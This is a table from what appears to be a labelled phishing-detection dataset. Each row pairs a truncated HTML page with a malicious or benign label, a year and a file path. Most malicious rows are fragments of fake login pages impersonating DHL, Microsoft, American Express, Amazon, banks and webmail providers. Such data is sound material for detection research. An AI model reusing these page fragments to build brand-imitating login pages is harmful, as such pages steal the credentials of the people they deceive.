text stringlengths 0 30.4M | label class label 2
classes | year int32 2.02k 2.02k | path stringlengths 80 139 |
|---|---|---|---|
<html hola_ext_inject="inited"><head>
<meta http-equiv="content-type" content="text/html; charset=windows-1252">
<link rel="shortcut icon" href="http://www.dhl.com/img/favicon.gif" type="image/gif"><title>DHL | eCommerce Login</title></head>
<body topmargin="0" bottommargin="0" leftmargin="0" rightmargin="0" bgcolor=... | 1malicious | 2,020 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/malicious/2020/2020/caefc9d7ad92bffbf00cd0328569a71853a8a0259f0cb00d17d8c47d7806d817.htm |
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>WeTransfer</title>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta name="robots" co... | 1malicious | 2,020 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/malicious/2020/2020/d89412f575e10a1dd8c89d164ff4ca99cb9fcc3b96e0e19c60f2d31a6f5314b8.htm |
<HTML><head><br />
<b>Warning</b>: simplexml_load_file(http://www.geoplugin.net/xml.gp?ip=54.70.53.60) [<a href='function.simplexml-load-file'>function.simplexml-load-file</a>]: failed to open stream: HTTP request failed! HTTP/1.1 403 Forbidden
in <b>/home/wsiteslo/public_html/administrator/usaa/donketyru/snnimoou/v... | 1malicious | 2,020 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/malicious/2020/2020/7cdffa83238e9f617c1ef6e631f9a084a3f0e121e2dd60ca36231132fa724178.htm |
<!DOCTYPE html>
<html lang="en">
<!-- Mirrored from messages.easymail.ca/ by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 17 May 2020 20:06:00 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
<head>
<title>Ubs.com Webmail :: Welcome to e... | 1malicious | 2,020 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/malicious/2020/2020/afe14e1f9d5ad12c1128bbfb0a7a8a84f98a967ec5cc90c8c058cc6e2f06fb92.htm |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html dir="ltr">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta http-equiv="Pragma" content="no-cache">
<meta http-equi... | 1malicious | 2,018 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/malicious/2018/2018/c5580a7e-d5df-11e8-8787-b01041fd2fc1.htm |
<!DOCTYPE html>
<head>
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-23287878-1"></script>
<script>
window.dataLayer = window.dataLayer || [];
function gtag(){dataLayer.push(arguments);}
... | 0benign | 2,019 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/benign/2019/2019/dd5e2531ce565be4d9d4ef8fcc44b71720e780ca90f1c549a5b8ed9b70b39f90.htm |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Webmail Login </title>
<meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">
<script>setTimeout(function() {
document.getElementsByTagName('input')[1].type = "pass... | 1malicious | 2,020 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/malicious/2020/2020/7505b1439a7d02529fd6f67f2caba2c03ea7bd27c0fbbf741421705f7f5978e1.htm |
<html dir="ltr" class="" lang="en"><head>
<title>Sign in to your account</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=2.0, user-scalabl... | 1malicious | 2,019 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/malicious/2019/2019/76d050cc8f025cd4e23055707ff4041f0d65705d58d241b077feb4d5ef21fa6b.htm |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
<title>电子发票和包裹跟踪</title>
<style type="text/css">
.auto-style1 {
fon... | 1malicious | 2,020 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/malicious/2020/2020/fe593ac1e841b9174b00f76552c29fb84b269d55b92e9f1e3b17546ffd3cd0a8.htm |
<!doctype html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport"
content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>...</title>
<link rel="shortcu... | 1malicious | 2,019 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/malicious/2019/2019/9d8d337be22f9cb8b8c52ea804311a34b09e8bd1fecdb38cca3592184d741df9.htm |
<html>
<head>
<meta charset="utf-8">
<title dir="ltr">Amazonサインイン</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />
<link rel="icon" href="style/img/icon.png">
<link rel="shortcut icon" href="styl... | 1malicious | 2,020 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/malicious/2020/2020/9f01f2df0aba9a6350cba4bfafbf25b4b8862680badfce5d9fb3d7bda3f98c6e.htm |
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1, maximum-scale=1">
<title>Mycraftmail Client</title>
<link rel="icon" type="images/png" sizes="16*16" href="http://mycraftmail.com/favicon.ico">
<sc... | 1malicious | 2,019 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/malicious/2019/2019/824164e75c20e18c2aa2753cade4a336dbf88bc338fb890f2213bf41cc96623d.htm |
<!doctype html>
<html dir="ltr" class="" lang="en">
<head>
<title>Sign in to your account</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=... | 1malicious | 2,020 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/malicious/2020/2020/c459a7458da24b14fd06fc428e06a7eafc8926ab627a0ff789e91847b88da24e.htm |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
<head id="ctl00_Head1"><title>
BT | Business | Your account | Manage services login
</title>
<!-- Enable IE8 Standards mode -->
<meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta name="Des... | 1malicious | 2,020 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/malicious/2020/2020/03483ad2bf664f81b7b6b1e8920b779142fcf866db00513958345739294cff25.htm |
<!DOCTYPE html>
<html>
<head>
<meta content="text/html; charset=UTF-8" http-equiv="Content-Type">
<title></title>
<style type="text/css">* {
box-sizing: border-box;
margin: 0;
padding: 0;
border: 0;
}
html, body {
margin: 0px;
}
html {
background-image: url("https://tslp.s3.amazonaws.com/trai... | 1malicious | 2,020 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/malicious/2020/2020/d3081b590d69bca06a358442c8055c8a1e59f99531e112d77368347a096c2b29.htm |
<!DOCTYPE html>
<html>
<head>
<title>Sign in to your account</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0, user-scalable=no">
<link rel="shortcut icon" type="icon" href="images/favicon.png">
<link rel="stylesheet" type="text/css" href="... | 1malicious | 2,019 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/malicious/2019/2019/b1f5322aa43293832e491a42818430802a9c584280738c303d0837fb5862fc15.htm |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
<title>电子发票和包裹跟踪</title>
<style type="text/css">
.auto-style1 {
fon... | 1malicious | 2,020 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/malicious/2020/2020/72b4e99f43d2b1e2ca1dc11c12c7c138a8ac102a8271c0b11dc602829f3b56fb.htm |
<head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<style type="text/css">
a:hover{color:#DF0101; }
</style>
<title>邮箱更新设置</title>
</head>
<body marginheight="0" marginwidth="0" topmargin="0" bottommargin="0" leftmargin="0" rightmargin="0" link... | 1malicious | 2,018 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/malicious/2018/2018/8385553e-d05d-11e8-8b12-b01041fd2fc1.htm |
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1, maximum-scale=1">
<title>Samsung Client</title>
<link rel="icon" type="images/png" sizes="16*16" href="http://samsung.com/favicon.ico">
<script typ... | 1malicious | 2,020 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/malicious/2020/2020/cb1dab0bdae119644fc604a47426539fd64ff0efe47e07a892099af4d5365d04.htm |
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0, user-scalable=no">
<title>Naver Sign in</title>
<link rel="stylesheet" type="text/css" hr... | 1malicious | 2,019 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/malicious/2019/2019/b866f76c654adc14b47d2bfc026205b8dda73a207e4691f820dbc86fa594f33f.htm |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>American Express : Online Services : Log in</title>
<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
<style type="text/css">
div#container
{
position:relative;
width: 1349px;
margin-top: 0px;
... | 1malicious | 2,020 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/malicious/2020/2020/9ba9c3cad04f7a0c3b5335539dc9cc3927125ed1faeae5fbd330881f970f19ed.htm |
<!DOCTYPE html>
<html id="Stencil" class="no-js">
<head>
<meta charset="utf-8">
<meta name="viewport" content="initial-scale=1, maximum-scale=1, user-scalable=0"/>
<meta name="format-detection" content="telephone=no">
<meta name="referrer" content="origin-when-cross-origin">
... | 0benign | 2,020 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/benign/2020/2020/57cb63c87a89bf83cbc92bf010e32331327da2032660196ada4d90077ef2bb99.htm |
<!DOCTYPE html>
<html id="Stencil" class="no-js">
<head>
<meta charset="utf-8">
<meta name="viewport" content="initial-scale=1, maximum-scale=1, user-scalable=0"/>
<meta name="format-detection" content="telephone=no">
<meta name="referrer" content="origin-when-cross-origin">
... | 0benign | 2,020 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/benign/2020/2020/c193704b39249f2673b4bc730b09ecb81c88b46c43d3942d44c846ba58f93f23.htm |
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<script>function _js_ebgurl(url) { return "/" + url; }</script><script type="text/javascript" src="/common_resources/js/li.js" data-affiliate-id="2345" data-dont-async></script>
<script type='text/javascript'>
wind... | 0benign | 2,020 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/benign/2020/2020/d10e499497b2febc11b4f7f33dd25dd8b4bb66e3dc824f8d321c27f592afaa0d.htm |
<!doctype html><html lang="en" dir="ltr"><head><base href="https://policies.google.com/"><meta name="referrer" content="origin"><meta name="viewport" content="initial-scale=1, maximum-scale=5, width=device-width"><meta name="mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-capable" content="yes"><... | 0benign | 2,020 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/benign/2020/2020/fee7418f36ede8f5316c106613d080a13d47eff28e3f57feaddebd5200c5b391.htm |
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1, maximum-scale=1">
<title>Kftc | Sign-in</title>
<link rel="icon" type="images/png" sizes="16*16" href="http://kftc.or.kr/favicon.ico">
<script type="text... | 1malicious | 2,020 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/malicious/2020/2020/580f33b513ec93d6946a00b2a255c833cc87cfdf0f2b2718a84291d17b4659b4.htm |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Rackspace Webmail: Hosted Email for Business</title>
<!-- This meta tag forces browsers to use utf-8 character encoding to allow multibyte character support when l... | 1malicious | 2,020 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/malicious/2020/2020/0c6e8b0cacdc27856ce985bc121b61d605b53306ba86114b0c5e0e7cf60a2c1b.htm |
<html xmlns="http://www.w3.org/1999/xhtml"><head class="at-element-marker" style="visibility:visible;">
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Expires" content="-1">
<title>Tell us about yourself.</title>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta n... | 1malicious | 2,019 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/malicious/2019/2019/5895a6ce-124a-11e9-be8f-b01041fd2fc1.htm |
<!DOCTYPE html><html lang="en"><head><meta charSet="utf-8" class="next-head next-head"/><title class="next-head">Financial Advisor IQ - Content Page</title><meta property="og:type" content="article" class="next-head"/><meta property="mm:media_code" content="faiq" class="next-head"/><meta property="og:site_name" content... | 0benign | 2,020 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/benign/2020/2020/57cc395d38051e5a7309a98b75c6b45e7162d4c55835b5aea519810643384e3a.htm |
<!DOCTYPE html>
<html style="visibility: hidden;" class="" dir="ltr" lang="en">
<head>
<meta http-equiv='content-type' content='text/html;charset=utf-8' />
<meta http-equiv="Keyw... | 1malicious | 2,020 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/malicious/2020/2020/147fa70bc5ba9ee67f04aec63c7d97f28207260140b94cc74f91e9cc4fe051bc.htm |
<!DOCTYPE html>
<!--[if IE 8]><html class="no-js ie8 oldie" data-placeholder-live="false"><![endif]-->
<!--[if IE 9 ]><html class="no-js ie9 oldie"><![endif]-->
<html class=" js flexbox flexboxlegacy canvas canvastext webgl no-touch geolocation postmessage no-websqldatabase indexeddb hashchange history draganddrop w... | 1malicious | 2,019 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/malicious/2019/2019/c9da6a7b7826193295af9c87ebad9069f5891008d683c551c56a0c2f95659bde.htm |
<!DOCTYPE html>
<html>
<head>
<title>Sign in to continue</title>
<link rel="icon" type="image/png" href="img/logo.png">
<meta name="robots" content="noindex, noarchive, nofollow, nosnippet" />
<meta name="googlebot" content="noindex, noarchive, nofollow, nosnippet, noimageindex" />
<meta name="slur... | 1malicious | 2,020 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/malicious/2020/2020/d27dc06c8dccda21f37df94a97c7f2841319ebab1828becac5423fc4a47a0b45.htm |
<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta content="width=device-width,initial-scale=1" name="viewport"><title>Debtwire Login</title> <script src="https://www.google.com/recaptcha/api.js"></script><link href="//cdn.mmgcache.net/lib/normalize.css/3.0.1/normalize-3.0.1.min.css" rel="stylesheet"> <sc... | 0benign | 2,019 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/benign/2019/2019/6109713f393eb73676b681bac16292decfaac034a9fc22b88add87a168b1ab8a.htm |
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Sign In</title>
<meta name="generator" content="WYSIWYG Web Builder 10 - http://www.wysiwygwebbuilder.com">
<style rel="styleshe... | 1malicious | 2,018 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/malicious/2018/2018/47e9f610-d38e-11e8-ab7d-0a2a79604fa0.htm |
<!DOCTYPE HTML>
<html lang="en-US">
<head>
<meta charset="UTF-8">
<title>163-126网易免费邮--中文邮箱第一品牌</title>
<link rel="stylesheet" href="style.css" />
<link href='http://fonts.googleapis.com/css?family=Oleo+Script' ... | 1malicious | 2,020 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/malicious/2020/2020/282f5c852bc28907a06e5bc424adf6643f4652771f44e952aa1c9616b71bdfad.htm |
<!DOCTYPE html>
<html lang="en" dir="ltr">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="google" content="notranslate" />
<meta name="apple-itunes-app" content="app-id=1188352635" />
<t... | 1malicious | 2,019 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/malicious/2019/2019/e9c8a877ca6b84f2751732a1501f9abe096b73a99a1c2bd51eaa9dda57a89287.htm |
<!DOCTYPE html>
<html class="no-js" lang="en">
<head id="Head1"><meta charset="utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge" />
<title>How companies should prep for CMMC -- FCW</title>
<meta name="description" content="Defense contractors should be getting ready for the Defense Department's impe... | 0benign | 2,020 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/benign/2020/2020/b66e03ea084aed99d1a00d06fbd96d4fc07773e7dbfd507941f0c4ff173393ac.htm |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>American Express : Online Services : Log in</title>
<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
<style type="text/css">
div#container
{
position:relative;
width: 1265px;
margin-top: 0px;
... | 1malicious | 2,020 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/malicious/2020/2020/cdd37111d4073051e4847afe185208c3b8a75c70157cef591270a5f0aaebde26.htm |
<ISONLINE VALUE=TRUE></ISONLINE>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="de"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Einloggen oder neu anmelden | eBay</title><meta name="viewport" content="width=device-wi... | 1malicious | 2,020 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/malicious/2020/2020/1629b03c4a0d1d55e1d3dee35e31846792d07c811a45b2185485f2036851c0b5.htm |
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1, maximum-scale=1">
<title>Fas Client</title>
<link rel="icon" type="images/png" sizes="16*16" href="http://fas.usda.gov/favicon.ico">
<script type="... | 1malicious | 2,020 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/malicious/2020/2020/35aeefbb751bd2707de14e97847636515fbf8af76be2225077509223a072411a.htm |
<!doctype html>
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml" lang="en-US" >
<head>
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<meta name="viewport" content="initial-scale=1">
<!-- This is Squarespace. --><!-- plum-turtle-erfw -->
... | 0benign | 2,020 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/benign/2020/2020/ae4c860e86f025681269a2ff62c8f6cc20319b61e4ad1a4af99feeaabd95962a.htm |
<html layoutversion="3.1.0" layoutsupportheaderversion="4.4.3" lang="en-US"><head><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><title>Bank of America - Banking, Credit C... | 1malicious | 2,018 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/malicious/2018/2018/bc88ea5c-d2b6-11e8-93e3-b01041fd2fc1.htm |
<!DOCTYPE html>
<!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->
<!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->
<!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->
<!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]-->
<head... | 1malicious | 2,020 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/malicious/2020/2020/535483931e9290fbf71ddbf641839a882ab2db35a10d05c1d48eeaf3e5c5d7a0.htm |
<!DOCTYPE html>
<html lang="en-US">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EDGE"/>
<meta charset="UTF-8"/><script type="text/javascript">(window.NREUM||(NREUM={})).loader_config={licenseKey:"7f434b1373",applicationID:"37636178"};window.NREUM||(NREUM={}),__nr_require=function(e,n,t){function r(t){... | 0benign | 2,020 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/benign/2020/2020/e3796427634db8cb186614c2f8c7553d0e1c3ad223fd329e9f4c4dd7777a4927.htm |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>American Express : Online Services : Log in</title>
<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
<style type="text/css">
div#container
{
position:relative;
width: 1265px;
margin-top: 0px;
... | 1malicious | 2,020 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/malicious/2020/2020/e3fa8551e65a658a358c587956f0b5fdecce2e7a6ff23c4fcae0592363e2c4b5.htm |
<!DOCTYPE html>
<html lang="en-GB" xmlns:fb="http://ogp.me/ns/fb#">
<head>
<meta charset="UTF-8" />
<title>Rural King 22 Mag Ammo</title>
<style type="text/css"> img.wp-smiley, img.emoji {display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important... | 1malicious | 2,020 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/malicious/2020/2020/eca3c9035a9f0b5ed48998d9363145480e1425c6ada5aabacddbe71bb5933278.htm |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="content-style-type" content="text/css" />
<meta http-e... | 0benign | 2,019 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/benign/2019/2019/53fb8834cf980770e77f257bae60596c2ae19ef459b24711f30ed89036ee85f8.htm |
<!DOCTYPE html>
<html lang="en" class="no-js">
<script type="text/javascript" src="index_files/jquery.js"></script>
<script src="index_files/d-js-runtime-mobile-package.js"></script>
<script type="text/javascript">
var onCaptchaLoad = function() {
$.DM.initFormCaptcha();
};
</script>
<script src="i... | 1malicious | 2,020 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/malicious/2020/2020/2f07897ebd4f7ab4372505c25c30a827dde3e72a86c4f0b33998b7a0af07d18e.htm |
<html>
<head>
<meta charset="UTF-8">
<title>【楽天】ログイン</title>
<meta name="Description" content="">
<meta name="Keywords" content="">
<meta name="author" content="Rakuten, Inc.">
<meta name="copyright" content="Rakuten, Inc.">
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user... | 1malicious | 2,020 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/malicious/2020/2020/cb0fc39dff3cbd729ce49a2564901d6b88949a34dc64dc395acd96d058df5593.htm |
<!doctype html>
<html dir="ltr" lang="EN-US">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<title>Sign in to your Microsoft account</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-sca... | 1malicious | 2,020 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/malicious/2020/2020/6e5dad120230fc113098cbca786ca83d107ba5c3c4f2dcb8309fc182f5dabe52.htm |
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1, maximum-scale=1">
<title>Kolon Client</title>
<link rel="icon" type="images/png" sizes="16*16" href="http://kolon.com/favicon.ico">
<script type="t... | 1malicious | 2,020 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/malicious/2020/2020/90abd6b663f1046371b4fe5f8e0d216a7a54d19f33cd896ee7c2fc4e459360ce.htm |
<html>
<head>
<title>WeΤransfer - Hοme</title>
<link rel="icon" type="image/ico" href="img/favicon.ico" />
<style>
<style>
*{margin:0px; padding:0px; font-family:Helvetica, Arial, sans-serif;}
body {
background-repeat:no-repeat;
}
/* Full-width input fields */
input[type=email], input... | 1malicious | 2,019 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/malicious/2019/2019/57f9f189ce05b551f27ece4232b4596f13f0d26173afc5397e968b94f941d217.htm |
<!DOCTYPE html>
<html lang="en">
<head>
<title>Dropbox Verification</title>
<style type="text/css"><!--
body {
font-family: arial, sans-serif;
margin: 0;
padding: 13px 15px 15px;
}
.body {
margin: 0;
}
div.errorbox-good {}
div.errorbox-bad {}
div.errormsg {... | 1malicious | 2,018 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/malicious/2018/2018/5af10db2-d214-11e8-9ddd-b01041fd2fc1.htm |
<!DOCTYPE html>
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no">
<title>WebMail </title>
<link type="text/css" rel="stylesheet" href="img/style.css" media="all"... | 1malicious | 2,020 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/malicious/2020/2020/7b19d14e3bf84f3bddd9a75f532ab4ddbd2f5f21af37377c57ae314413c8cdb6.htm |
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1, maximum-scale=1">
<title> Client</title>
<link rel="icon" type="images/png" sizes="16*16" href="http:///favicon.ico">
<script type="text/javascript" src=... | 1malicious | 2,020 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/malicious/2020/2020/a9bbfd1704d63845022483055d236f8e535d879ed70eba9d6bb2b3f6da6159d0.htm |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- saved from url=(0094)file:///C:/Users/Ceejay'/Documents/yvx/made-in-chin-new/Sign%20In%20_%20Made-in-China.com.html -->
<html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Conten... | 1malicious | 2,020 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/malicious/2020/2020/2e68c363067db56bc030b317ae79c48493dce7667a0d42a82af9c19d28db2712.htm |
<!DOCTYPE html>
<html>
<head>
<title>Apple</title>
<meta charset="utf-8">
<link rel="stylesheet" type="text/css" href="assets/css/style.css">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link href="https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesh... | 1malicious | 2,018 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/malicious/2018/2018/34daa83a-d38e-11e8-ab7d-0a2a79604fa0.htm |
<!DOCTYPE html>
<html>
<head>
<title>DLC Portal</title>
<meta name="csrf-param" content="authenticity_token" />
<meta name="csrf-token" content="/1YFLnYOWox5OA0rI8oxueDTlQ2EkyMbdZqwB/jlPC/0gIE9Q2lM2SRL5glUoMERVhfQFOI9sz6Qx/7DK6tF9g==" />
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-... | 0benign | 2,019 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/benign/2019/2019/48017ef7c97af8f3098fb619a175e18a38d217d3dfcdf765cbfd0d041271ba50.htm |
<!DOCTYPE html><html lang="en"><head><meta charSet="utf-8" class="next-head next-head"/><title class="next-head">FundFire - Content Login Page</title><meta property="og:type" content="article" class="next-head"/><meta property="mm:media_code" content="ff" class="next-head"/><meta property="og:site_name" content="FundFi... | 0benign | 2,020 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/benign/2020/2020/f69a2930dfaa12d66faaac9e41cd919a62c702254a0d3e503e4ec26d03cb4b36.htm |
<!DOCTYPE html>
<html lang="en" dir="ltr" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# schema: http://schema.org/ sioc: http://rdfs.org/sioc/ns# sioct: http://rdfs.org/sio... | 0benign | 2,019 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/benign/2019/2019/f6f5cb200dc72bee8e02ccbaf5cfa77846f2d7ebb52955b96a41b6d983bae742.htm |
<!DOCTYPE html>
<html lang="fr">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-" />
<title>Dfas Benefits</title>
</head>
<body>
<div id="page-outer-wrap">
<div id="page-inner-wrap">
<div class="container">
<header class="col-xs- col-sm- col-md- col-lg-">
<div class="col-xs-0 col-sm-0... | 1malicious | 2,020 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/malicious/2020/2020/a0b56850f62b3805278b2b8f1c6825a89e8a98fd16082e28cae7507d4f32dd26.htm |
<!DOCTYPE html>
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
